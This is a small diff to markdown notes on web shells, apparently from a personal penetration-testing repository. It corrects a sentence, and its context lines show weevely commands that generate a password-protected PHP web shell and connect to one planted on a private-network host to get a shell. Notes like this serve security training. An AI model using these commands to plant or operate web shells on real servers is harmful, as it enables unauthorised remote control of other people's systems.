Reboare/backup/web-applications/webshells.md

 weevely generate password /root/webshell.php
 ```

-Not we execute it and get a shell in return:
+Now we execute it, point it to the remote page and get a shell in return:

 ```
 weevely "http://192.168.1.101/webshell.php" password